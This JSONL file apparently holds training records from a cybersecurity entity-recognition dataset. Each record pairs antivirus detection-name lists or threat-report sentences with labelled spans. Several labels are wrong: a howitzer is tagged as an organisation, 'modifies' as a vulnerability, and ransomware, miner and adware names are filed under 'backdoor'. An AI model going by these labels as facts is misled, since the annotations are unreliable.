{"text": "A backdoor also known as: W32.LRSgzengelSvrA.Trojan Trojan/W32.Rootkit.78592 Trojan.Festi.C6 Trojan/Tent.cow Trojan.Rootkit.1 RTKT_FESTI.SM Win32.Trojan.WisdomEyes.16070401.9500.9989 Trojan.Festi RTKT_FESTI.SM Win.Trojan.Rootkit-4345 Trojan.Win32.Tent.ddfje Trojan.NtRootKit.12267 Rootkit.Tent.Win32.134 Rootkit.Tent.fc RKIT/Tent.aui Trojan[Rootkit]/Win32.Tent Backdoor:WinNT/Festi.C Win-Trojan/Festi.78592 TScope.Malware-Cryptor.SB Trj/CI.A Win32.Exploit.Tent.cmvx", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001336", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.downCN.Adware Trojan-Downloader.Win32.Petus!O Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_DLDR.SMIH Trojan.Win32.Petus.efjtuk Trojan.Win32.A.Downloader.69153 Troj.Dropper.W32.StartPage.lmCy Trojan.DownLoader4.54937 Downloader.Petus.Win32.9 TROJ_DLDR.SMIH Trojan-Downloader.Win32.Petus Trojan[Downloader]/Win32.Petus TrojanDownloader:Win32/Petus.C Trojan/Win32.Petus.R4023 Win32/Trojan.c81", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001338", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.Cosmu.PE Win32.Worm.VB.NZQ Trojan.Win32.Cosmu!O W32.Lamer.EL3 Trojan.Downloader Worm.VB.Win32.26804 Trojan/VB.nup Win32.Virus.VBbind.a W32.Besverit Win32/VB.JU TROJ_DLOADR.SMM Win.Trojan.Cosmu-4 Virus.Win32.Lamer.el Win32.Worm.VB.NZQ Trojan.Win32.VB.ltch Trojan.Win32.Cosmu.887991 Worm.Win32.VB.kp Win32.Worm.VB.NZQ Win32.Worm.VB.NZQ Win32.HLLW.Autoruner.6014 TROJ_DLOADR.SMM BehavesLike.Win32.Autorun.vh Worm.Win32.VB Trojan/Cosmu.lan Win32.Worm.VB.NZQ Troj.Downloader.W32.VB.l4ji Virus.Win32.Lamer.el Win32.Worm.VB.NZQ Win32/Lamer.D Win32.Worm.VB.NZQ SIM.Trojan.VBO.0859 Win32/VB.NUP W32/AutoRun.RPV!worm W32/OverDoom.A Virus.Win32.Lamer.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001340", "source": "cyner2_train"}}
{"text": "In early 2015, FIN1 updated their toolset to include a utility that modifies the legitimate system Volume Boot Record VBR and hijacks the system boot process to begin loading Nemesis components before the Windows operating system code.", "spans": {"THREAT_ACTOR: FIN1": [[15, 19]], "VULNERABILITY: modifies": [[68, 76]], "MALWARE: Nemesis components": [[175, 193]], "SYSTEM: Windows operating system": [[205, 229]]}, "info": {"id": "cyner2_train_001341", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.Java.CVE20130422.crcqcf Exploit:Java/CVE-2013-0422.A heur:Exploit.CVE-2013-0422 Exploit:Java/Obfuscator.AS Trojan.Java.Downloader virus.java.bot.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001343", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.PasistA.Worm Worm.Sfone.A3 Worm.Sform Worm.Sfone W32/Worm.BLGI W32.SillyWNSE Win32/Sfone.A BehavesLike.Win32.Trojan.ch W32/Worm.KOKR-0749 Worm:Win32/Sfone.A Worm.Sfone.A W32/WinSxsBot.A.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001345", "source": "cyner2_train"}}
{"text": "Communicates via TOR", "spans": {"SYSTEM: TOR": [[17, 20]]}, "info": {"id": "cyner2_train_001348", "source": "cyner2_train"}}
{"text": "Without the use of SSL interception traditional IDS/IPS systems could cease to detect compromised systems.", "spans": {"SYSTEM: IDS/IPS systems": [[48, 63]], "SYSTEM: compromised systems.": [[86, 106]]}, "info": {"id": "cyner2_train_001350", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Theals W32/Theals.dam Worm.Theals.Win32.2 Win32.Trojan.WisdomEyes.16070401.9500.9975 Win32/VB.VOMRAe Win.Exploit.DCOM-5 Net-Worm.Win32.Theals.c Virus.Win32.Theals.vvbf Net.Worm.W32!c Virus.Win32.Theals_re.c Win32.Zombie.4214 BehavesLike.Win32.Virut.ch Worm/Theals.i W32/Theals.D Win32.Theals.bd.8704 Net-Worm.Win32.Theals.c Worm/Win32.Theals.C1456665 Virus.Win32.Stealth.c W32/Theals.C!worm.im Win32/Trojan.529", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001351", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Delf.S10 Trojan.Delf.Win32.63014 Troj.W32.Bcex.tnto Win32.Trojan.Delf.ah Downloader.Ponik Win.Trojan.Delf-33216 Win32.Trojan-Dropper.FakeDoc.B Trojan.Win32.Broskod.rb Trojan.Win32.Delf.cqqvkh TrojWare.Win32.Delf.DHHK BehavesLike.Win32.AdwareDealPly.ch Worm.Win32.Takc Trojan/Win32.Unknown Worm:Win32/Takc.A Trojan.Win32.Broskod.rb Hoax.Blocker Win32.Virus.Delf.Wsjq Trojan.Delf!8gjXiSoqNjg W32/Delf.NBJ!tr Win32/Trojan.Delf.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001352", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Apollo Ransom.Apollo Ransom_Apollo.R058C0TLR17 Win32.Trojan.WisdomEyes.16070401.9500.9925 W32/Trojan.MNOB-4766 Ransom_Apollo.R058C0TLR17 Win32.Trojan-Ransom.ApolloLocker.A Trojan.Win32.Crypted.ewmuiu W32.Troj.Ransom!c Ransom.Win32.Apollo Ransom:Win32/Apollo.A Trj/CI.A Win32/Trojan.160", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001354", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.JobLaunch.ODB Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Memsyl TROJ_NECURS.SMJ10 Trojan.Win32.Crypted.dgzzxe Trojan.DownLoader11.38598 TROJ_NECURS.SMJ10 W32/Trojan.TVCC-2701 TrojanDropper.Injector.atzu Trojan.Zusy.D1B5A0 Dropper/Win32.Necurs.R121870 TrojanDropper.Injector Trojan.MSIL.Inject MSIL/Injector.FWI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001355", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.C675 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.IUJL SecurityRisk.Downldr Trojan.DownLoad.42343 W32.Malware.Downloader Trojan.Kelios.1 TScope.Malware-Cryptor.SB Trojan.Win32.Dogrobot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001356", "source": "cyner2_train"}}
{"text": "Initial research identified that the filename suggested a relationship to the D-30 122mm towed howitzer, an artillery weapon first manufactured in the Soviet Union in the 1960s but still in use today.", "spans": {"ORGANIZATION: the D-30 122mm towed howitzer,": [[74, 104]], "ORGANIZATION: artillery weapon": [[108, 124]]}, "info": {"id": "cyner2_train_001357", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9772 Win.Trojan.Adwind-9 W32/Trojan.YEAY-3186 W32.Dropper.Java Trj/CI.A Win32/Application.22f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001358", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.38CB Virus.Win32.Virut", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001359", "source": "cyner2_train"}}
{"text": "Until now, it was widely believed the actor's activities had largely subsided in 2013, following numerous public disclosures and detailed analyses of their backdoors.", "spans": {"THREAT_ACTOR: actor's": [[38, 45]], "MALWARE: backdoors.": [[156, 166]]}, "info": {"id": "cyner2_train_001361", "source": "cyner2_train"}}
{"text": "Surprisingly, there is a lot of media attention going on at the moment on a macOS malware called OSX/Dok.", "spans": {"SYSTEM: macOS": [[76, 81]], "MALWARE: malware": [[82, 89]], "MALWARE: OSX/Dok.": [[97, 105]]}, "info": {"id": "cyner2_train_001362", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Symmi.DEFF7 W32.Extrat Win.Trojan.B-471 BackDoor.Cybergate.4022 BehavesLike.Win32.Backdoor.gc Troj.W32.Scar.lByG Trojan.Win32.Xtrat.ldu Backdoor/Win32.Poison.R139029 Trojan.Xtrat Trojan.Win32.Remtasu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001363", "source": "cyner2_train"}}
{"text": "The Trojan may send the following information to one of the remote locations: Computer name", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_001365", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.DoS.751104 DoS.Win32.Delf!O Trojan/DOS.Delf.j DoS.Delf!7331ealGHQM W32/Worm.ATZ Hacktool.Flooder TROJ_DELF.FOE DoS.Delf DoS.Win32.Delf.j Trojan.Win32.Delf.hdtu PE:Hack.DDoSer.Win32.Delf.j!1074949418 Tool.Delf.Win32.630 TROJ_DELF.FOE BehavesLike.Win32.Trojan.bh W32/Worm.OXOE-7458 Trojan/DDoS.Delf.f DDOS/Delf.J.4 HackTool[DoS]/Win32.Delf Win32.Hack.Delf.j.kcloud Trojan.Win32.Dos-Delf.626688[h] Win-Trojan/Xema.variant DoS.Delf Trojan.Win32.Delf.j Win32.Trojan.Delf.brp Trojan-Dropper.Delf W32/Delf.A!tr DoS.BRY Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001367", "source": "cyner2_train"}}
{"text": "In the months leading up to August, the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office, Oracle Sun Java, Adobe Flash Player and Windows itself.", "spans": {"THREAT_ACTOR: Sofacy group": [[40, 52]], "VULNERABILITY: zero-day exploits": [[98, 115]], "SYSTEM: Microsoft Office, Oracle Sun Java, Adobe Flash Player": [[119, 172]], "SYSTEM: Windows": [[177, 184]]}, "info": {"id": "cyner2_train_001368", "source": "cyner2_train"}}
{"text": "A new variant of the notorious ransomware Petya is back - again - and with yet another James Bond reference for a name: Goldeneye.", "spans": {"MALWARE: new variant": [[2, 13]], "MALWARE: ransomware Petya": [[31, 47]], "MALWARE: Goldeneye.": [[120, 130]]}, "info": {"id": "cyner2_train_001369", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Cridex Trojan.Win64.Kryptik.exmlew Trojan.Win32.Z.Mikey.577536.K Trojan.Kryptik.Win64.1541 Trojan.Win64.Crypt W64/Trojan.WNTM-1890 TR/Crypt.ZPACK.fzarm Trojan/Win64.Dridex Trojan.Mikey.D123A2 Backdoor.NanoCore Trj/CI.A Win32.Trojan.Mikey.Szbg Win32/Trojan.4d2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001371", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.PePatch.Win32.108052 Trojan.Razy.D2AD35 Win32.Trojan.WisdomEyes.16070401.9500.9515 Trojan.Win32.Wencho.eqsozv Backdoor.Win32.Wencho Backdoor:Win32/Wencho.A Downloader/Win32.Paph.C1961981 TrojanDownloader.Paph Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001373", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Exploit/W32.IMG-WMF.23552.O Trojan-GameThief.Win32.OnLineGames!O Exploit.IMG.Win32.498 Trojan/Exploit.IMG-WMF.axd TROJ_BEHAV.FL Win32.Trojan.WisdomEyes.16070401.9500.9981 TROJ_BEHAV.FL Win.Trojan.Exploit-289 Exploit.Win32.IMGWMF.bekdjb Exploit.W32.IMG-WMF.loBk TrojWare.Win32.GameThief.Magania.~EV Trojan.DownLoad.15186 BehavesLike.Win32.Worm.mc Exploit.IMG-WMF.agp Rootkit.Small Trojan.Win32.KillAv.hd Exploit.Win32.IMG-WMF Win32/Trojan.Exploit.a54", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001374", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Delf Trojan.Heur.iO0au4aNrMf Win32.Trojan.WisdomEyes.16070401.9500.9705 W32/Trojan.UNZI-1320 W32.Datom.Worm Trojan.Win32.Delf.enaz Trojan.Win32.Datom.euwmlv Worm.Win32.Datom.A~1 Win32.HLLW.Datom BehavesLike.Win32.Sality.cc Virus.Worm.Datom Trojan.Win32.Delf.enaz Trojan/Win32.Buzus.C104859 Trojan.Delf Win32.Trojan.Delf.Swlf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001376", "source": "cyner2_train"}}
{"text": "SANS has published a new blog regarding a tax filing service that has been compromised.", "spans": {"ORGANIZATION: SANS": [[0, 4]], "SYSTEM: a tax filing service": [[40, 60]], "VULNERABILITY: compromised.": [[75, 87]]}, "info": {"id": "cyner2_train_001379", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.NirSoft.PSPassView.C PSWTool.Win32.PassView!O HackTool.Pspv.SD4 W32/PWS.IMQI-4038 Hacktool.PStorRevealer Application.NirSoft.PSPassView.C not-a-virus:PSWTool.Win32.PassView.iv Application.NirSoft.PSPassView.C Riskware.Win32.PassView.exmcew Application.NirSoft.PSPassView.C ApplicUnsaf.Win32.PSWTool.PassView.A Tool.PassView Tool.PassView.Win32.6 W32/PWStealer.CAT PSWTool.PassView.k Trojan[PSWTool]/Win32.PassView Application.NirSoft.PSPassView.C not-a-virus:PSWTool.Win32.PassView.iv TScope.Malware-Cryptor.SB PUP.Optional.PassView Trj/CI.A HackTool.IcqSmiley.A not-a-virus:PSWTool.Win32.PassView Win32/Application.40e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001380", "source": "cyner2_train"}}
{"text": "Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Afghanistan in China.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "ORGANIZATION: individual working": [[57, 75]], "ORGANIZATION: the Foreign Ministry of Afghanistan": [[80, 115]]}, "info": {"id": "cyner2_train_001381", "source": "cyner2_train"}}
{"text": "This threat targets Russians but the apps are accessible worldwide.", "spans": {"MALWARE: threat": [[5, 11]], "SYSTEM: apps": [[37, 41]]}, "info": {"id": "cyner2_train_001383", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Qhost.Win32.10597 Trojan/Qhost.pdq Trojan.Zusy.D5AFC Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Hosts.bgaqwt Troj.Banker.W32.Qhost.lE9S Trojan.Hosts.5268 Trojan.Win32.Hider Trojan/Win32.Unknown Trojan:WinNT/QHosts.B Win32/Qhost.PDQ Trojan.Qhost!QXppfUGnhzI W32/Kryptic.QHS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001384", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Spymel.A4 Trojan.ReconycCRTD.Win32.8402 Trojan.Zusy.D1E1BE Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Reconyc.inec Trojan.DownLoader13.49710 Trojan/Win32.Reconyc Backdoor:MSIL/Moidirat.A Trojan.Win32.Reconyc.inec Trojan.MSIL.Spy Win32/Backdoor.a11", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001385", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Nymaim.561152 Trojan.NymaimCS.S1199370 TROJ_NYMAIM.SMR2 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_NYMAIM.SMR2 Trojan.Win32.Nymaim.eqlfnf TrojWare.Win32.Nymaim.CH Trojan.Nymaim.143 BehavesLike.Win32.MultiPlug.hh Trojan-Downloader.Nymaim Trojan.Nymaim.czv TR/Crypt.Xpack.owrka Trojan/Win32.Nymaim Win32.Trojan.Nymaim.M Trojan/Win32.Nymaim.C2027429 Trojan.Nymaim Trojan.Nymaim Win32/TrojanDownloader.Nymaim.BA Trojan.Nymaim!ovdfLq+hmM4 W32/Nymaim.BA!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001386", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Java.Downloader.1096 BehavesLike.Win32.Trojan.vc Java.Obfus", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001389", "source": "cyner2_train"}}
{"text": "Microsoft Publisher is included and installed by default in Office 365.", "spans": {"ORGANIZATION: Microsoft Publisher": [[0, 19]], "SYSTEM: Office 365.": [[60, 71]]}, "info": {"id": "cyner2_train_001391", "source": "cyner2_train"}}
{"text": "Kaspersky Lab began this ongoing research in the autumn of 2011.", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "ORGANIZATION: research": [[33, 41]]}, "info": {"id": "cyner2_train_001392", "source": "cyner2_train"}}
{"text": "In this post we will review the research results of Votiro Labs and ClearSky, the weaponized documents and campaign infrastructure.", "spans": {"ORGANIZATION: Votiro Labs": [[52, 63]], "ORGANIZATION: ClearSky,": [[68, 77]], "SYSTEM: campaign infrastructure.": [[107, 131]]}, "info": {"id": "cyner2_train_001393", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.TP.ED1233C Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Z.Starter.204271 Trojan.Win32.Starter Exploit.ShellCode Trojan:Win32/Starter.P Trojan.Win32.Starter Trj/CI.A Win32.Trojan.Crypt.Dzkb Win32/Trojan.6f7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001395", "source": "cyner2_train"}}
{"text": "DustySky called NeD Worm by its developer is a multi-stage malware in use since May 2015.", "spans": {"MALWARE: DustySky": [[0, 8]], "MALWARE: NeD Worm": [[16, 24]], "THREAT_ACTOR: developer": [[32, 41]], "MALWARE: multi-stage malware": [[47, 66]]}, "info": {"id": "cyner2_train_001396", "source": "cyner2_train"}}
{"text": "When a user opens the .zip file and double clicks the JavaScript, the default browser Internet Explorer, Mozilla, etc. opens and executes JavaScript.", "spans": {"ORGANIZATION: user": [[7, 11]], "SYSTEM: Internet Explorer, Mozilla,": [[86, 113]]}, "info": {"id": "cyner2_train_001397", "source": "cyner2_train"}}
{"text": "We have identified a new distribution campaign which took place on 4th July.", "spans": {"THREAT_ACTOR: distribution campaign": [[25, 46]]}, "info": {"id": "cyner2_train_001398", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Minxer Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Trojan.CFWS-6788 Win32.Application.Bitcoinminer.W Riskware.Win64.BtcMine.eiegeg Trojan.BtcMine.604 Worm.WBNA.Win32.419008 W32.Trojan.Minxer Trojan.Razy.D197C7 Trojan.BitCoinMiner Trj/CI.A Riskware.BitCoinMiner! Win32/Trojan.582", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001399", "source": "cyner2_train"}}
{"text": "Linux.Rekoobe variant", "spans": {"MALWARE: variant": [[14, 21]]}, "info": {"id": "cyner2_train_001400", "source": "cyner2_train"}}
{"text": "Sex sells, and nowhere is that more true than the Chinese mobile landscape.", "spans": {}, "info": {"id": "cyner2_train_001401", "source": "cyner2_train"}}
{"text": "BAIJIU's goal in this attack was to deploy a set of espionage tools through a downloader we call TYPHOON and a set of backdoors we call LIONROCK.", "spans": {"THREAT_ACTOR: BAIJIU's": [[0, 8]], "MALWARE: espionage tools": [[52, 67]], "MALWARE: downloader": [[78, 88]], "MALWARE: TYPHOON": [[97, 104]], "MALWARE: backdoors": [[118, 127]], "MALWARE: LIONROCK.": [[136, 145]]}, "info": {"id": "cyner2_train_001402", "source": "cyner2_train"}}
{"text": "Adding AV exceptions", "spans": {"SYSTEM: AV": [[7, 9]]}, "info": {"id": "cyner2_train_001403", "source": "cyner2_train"}}
{"text": "The first one is used to receive a list of logins and passwords, the second one—for operation of the SOCKS proxy server.", "spans": {"SYSTEM: the SOCKS proxy server.": [[97, 120]]}, "info": {"id": "cyner2_train_001404", "source": "cyner2_train"}}
{"text": "Variants of H-Worm, primarily connecting to command and control servers located in Algeria.", "spans": {"MALWARE: Variants": [[0, 8]], "MALWARE: H-Worm,": [[12, 19]]}, "info": {"id": "cyner2_train_001405", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.ShipUp.90112 W32.VisuDir.A3 Trojan.Zusy.D2CF33 PE_SHIPUP.A Win32.Worm.ShipUp.h Win32/Gamarue.ISACBfC PE_SHIPUP.A Trojan.Win32.ShipUp.futk TrojWare.Win32.ShipUp.AR Trojan.KillFiles.28137 Worm.Win32.ShipUp Worm:Win32/Lecna.A!dha Trojan.Win32.ShipUp.futk Trojan/Win32.Cossta.R120893 Trojan.FakeDoc Trojan.Win32.Csyr.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001406", "source": "cyner2_train"}}
{"text": "The malicious macro inside the Office document is obfuscated as shown in the code snapshot below -Recently [Kaspersky] came across a new family of cross-platform backdoors for desktop environments.", "spans": {"VULNERABILITY: malicious macro": [[4, 19]], "MALWARE: code snapshot": [[77, 90]], "ORGANIZATION: [Kaspersky]": [[107, 118]], "MALWARE: family of cross-platform backdoors": [[137, 171]], "SYSTEM: desktop": [[176, 183]], "SYSTEM: environments.": [[184, 197]]}, "info": {"id": "cyner2_train_001408", "source": "cyner2_train"}}
{"text": "Typhon is an info stealer first that was reported in mid-2022 for the first time.", "spans": {"MALWARE: Typhon": [[0, 6]], "MALWARE: stealer": [[18, 25]]}, "info": {"id": "cyner2_train_001410", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Trojan.Win32.Pigeon.cxszod Uds.Dangerousobject.Multi!c Win32.Trojan.Mikey.Swlc BackDoor.Pigeon.8805 Backdoor.Hupigon.Win32.185096 Trojan.Mikey.D9181 HackTool:Win32/Goldoseri.A Win32/HackTool.DoSer.AE BackDoor.Pigeon! Win32/Trojan.6bf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001411", "source": "cyner2_train"}}
{"text": "On July 6, 2017, RSA FirstWatch noted renewed MONSOON APT campaign activity submitted from a community user in India to Virus Total.", "spans": {"ORGANIZATION: RSA FirstWatch": [[17, 31]], "THREAT_ACTOR: MONSOON APT campaign": [[46, 66]], "ORGANIZATION: community user": [[93, 107]], "ORGANIZATION: Virus Total.": [[120, 132]]}, "info": {"id": "cyner2_train_001412", "source": "cyner2_train"}}
{"text": "A backdoor also known as: RDN/BackDoor-AWQ.b Heur.Corrupt.PE Backdoor.Win32.Hupigon TrojanDropper:Win32/Arbinder.B.dam#2 Backdoor/Win32.Graybird.C194482", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001413", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Hacktool.Flooder BehavesLike.Win32.RAHack.xc Trojan-DDoS.Win32.Resod TrojanDDoS.Resod.g TR/DDoS.Maker.11.B Trojan[DDoS]/Win32.Resod DDoS:Win32/Resod.dam#2 Win32/Trojan.DDoS.835", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001415", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Wurmark.A@mm Win32.Wurmark.A@mm W32/Mugly.h@MM W32.W.Wurmark.g!c W32/Wurmark.g Win32.Wurmark.A@mm Win32.Wurmark.E90817 I-Worm.Wurmark!utsCc3R91ZU W32/Wurmark.F W32.Mugly.G@mm Win32/Wurmark.G WORM_MUGLY.H Worm.Wurmark.G Email-Worm.Win32.Wurmark.g Trojan.Win32.Wurmark.fsml Virus.Win32.Heur.c Win32.Wurmark.A@mm Worm.Win32.Wurmark.G Win32.Wurmark.A@mm Worm.Wurmark.Win32.11 WORM_MUGLY.H BehavesLike.Win32.VBObfus.fc W32/Wurmark.JPAN-1543 I-Worm.Wurmark.a WORM/Uglatad.2 Worm[Email]/Win32.Wurmark Worm:Win32/Mugly.H@mm Win32/Mugly.worm.351744 Win32.Wurmark.A@mm Win32/Mugly.G Worm.Wurmark Win32.Wurmark.A@mm Virus.Win32.QQRob.AS W32/Mugly.H@mm I-Worm/Wurmark.E Worm.Win32.Wurmark.AGmW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001418", "source": "cyner2_train"}}
{"text": "Darkhotel APT attacks dated 2014 and earlier are characterized by the misuse of stolen certificates, the deployment of .hta files with multiple techniques, and the use of unusual methods like the infiltration of hotel Wi-Fi to place backdoors in targets' systems.", "spans": {"THREAT_ACTOR: Darkhotel APT": [[0, 13]], "MALWARE: backdoors": [[233, 242]], "SYSTEM: targets' systems.": [[246, 263]]}, "info": {"id": "cyner2_train_001420", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Symmi.D11236 Win32.Trojan.WisdomEyes.16070401.9500.9993 DLOADER.Trojan Trojan-Downloader.Win32.Small Trojan/Win32.Rozepads.R172444 BScope.Trojan.Win32.Inject.2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001421", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Androm.1289728 Trojan.Skeeyah Backdoor.Bot Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan.UWVT-1669 W32.Golroted TROJ_INJECTOR_FE31022B.UVPM Backdoor.Win32.Androm.hjzg Trojan.PWS.Stealer.13025 TROJ_INJECTOR_FE31022B.UVPM BehavesLike.Win32.Trojan.tc W32/Trojan2.PTAY Backdoor/Androm.gyi Trojan[Backdoor]/Win32.Androm Trojan.MSIL.Androm.9 Backdoor.Win32.Androm.hjzg Trojan:MSIL/Loksec.A Trojan/Win32.Inject.R140951 Backdoor.Androm Trojan.Injector Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001423", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Dropper.Delf.bl TROJ_DROPPER.IPJ W32/Risk.CLFC-1497 Backdoor.Acropolis TrojanDropper.Delf TROJ_DROPPER.IPJ Win.Trojan.Acropolis-1 Trojan-Dropper.Win32.Delf.bl Trojan.Win32.Delf.ffej Dropper.Delf.972288 Troj.Dropper.W32.Delf.bl!c TrojWare.Win32.TrojanDropper.Delf.BL BackDoor.Acropolis.10 Dropper.Delf.Win32.1638 Trojan-Dropper.Win32.Delf W32/Dropper.HL TrojanDropper.Delf.cj W32.Trojan.Dropper-Tetris BDS/Acropolis.3 Trojan[Dropper]/Win32.Delf Win32.Troj.Delf.bl.kcloud Backdoor:Win32/Tetris.A Trojan.Graftor.D2B929 Trojan-Dropper.Win32.Delf.bl Win32/TrojanDropper.Delf.BL Win32.Trojan-dropper.Delf.Efao TrojanDropper.Delf!n6JtRIRZLjo W32/Acrop.A!tr.bdr Win32/Trojan.Dropper.605", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001424", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Backdoor.Win32.Nucleroot!O Win32.Trojan.WisdomEyes.16070401.9500.9750 Adware.Lop Win32/Talpalk.C Win.Trojan.Maha-2 Backdoor.Win32.Nucleroot.c Trojan.Win32.Maha.gubp Packer.W32.PePatch.l5Ml Packed.Win32.Klone.~KE Trojan.Maya BehavesLike.Win32.Ipamor.ch Trojan-Dropper.Delf Backdoor/Nucleroot.fk Trojan[PSW]/Win32.Maha Backdoor.Win32.A.Nucleroot.130560 Backdoor.Win32.Nucleroot.c PWS:Win32/Bividon.A Backdoor.Nucleroot W32/Nucleroot.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001425", "source": "cyner2_train"}}
{"text": "Security researchers have identified and identified a new type of malware, which they believe is being developed by threat actors operating from North, East and South-East Asia, and is capable of being fully undetectable.", "spans": {"ORGANIZATION: Security researchers": [[0, 20]], "MALWARE: malware,": [[66, 74]], "THREAT_ACTOR: threat actors": [[116, 129]]}, "info": {"id": "cyner2_train_001427", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Zbot Backdoor.Win32.DarkKomet.zvj Trojan.Win32.DarkKomet.dklzqc Trojan-Dropper.Win32.Injector Trojan[Backdoor]/Win32.DarkKomet Trojan.MSIL.Krypt.3 Backdoor.Win32.DarkKomet.zvj PWS:MSIL/Skonpri.A Backdoor/Win32.DarkKomet.R90638 Backdoor.DarkKomet Trj/CI.A Trojan.Krypt!XrXGvmn0xR4 W32/DarkKomet.FZ!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001428", "source": "cyner2_train"}}
